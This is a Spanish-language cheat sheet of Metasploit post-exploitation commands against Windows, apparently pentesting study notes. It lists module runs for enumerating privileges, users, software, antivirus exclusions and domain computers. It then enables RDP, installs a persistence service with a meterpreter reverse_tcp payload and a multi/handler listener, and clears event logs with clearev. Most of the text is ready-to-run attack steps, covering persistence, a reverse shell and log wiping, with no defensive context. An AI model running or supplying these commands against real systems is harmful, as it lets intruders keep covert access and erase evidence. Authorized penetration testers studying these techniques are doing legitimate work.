4 Post Explotación

Enumeracion post explotación #

Enumerar privilegios #

Una vez obtenido acceso a la máquina, podemos ver los privilegios que posee el usuario comprometido.

search win_privs
set SESSION <num>
run

Enumerar usuarios logueados o recientes #

search enum_logged_on_users
set SESSION <num>
run

Enumerar software instalado #

search enum_applications
set SESSION <num>
run

Enumerar exclusiones del antivirus #

search enum_av_excluded
set SESSION <num>
run

Enumerar equipos del dominio (si pertenece a uno) #

search enum_computers
set SESSION <num>
run

Habilitar RDP #

search enable_rdp
set SESSION <num>
run

Persistencia con persistance_service Metasploit #

search platform:windows persistence

### UN BUEN MÓDULO
persistance_service
## utilizamos este payload para el modulo
set payload windows/meterpreter/reverse_tcp

### Para conectarnos a la "persistencia"
## tener cuenta el LHOST Y LPORT configurados en la persistencia para conectarnos usando los mismos datos
use multi/handler
set payload windows/meterpreter/reverse_tcp (el mismo que usamos anteriormente)
set LHOST <eth0 o la que corresponda)
run

Eliminar logs de eventos (Metasploit) #

Teniendo una sesión de meterpreter establecida, metemos el comando:

clearev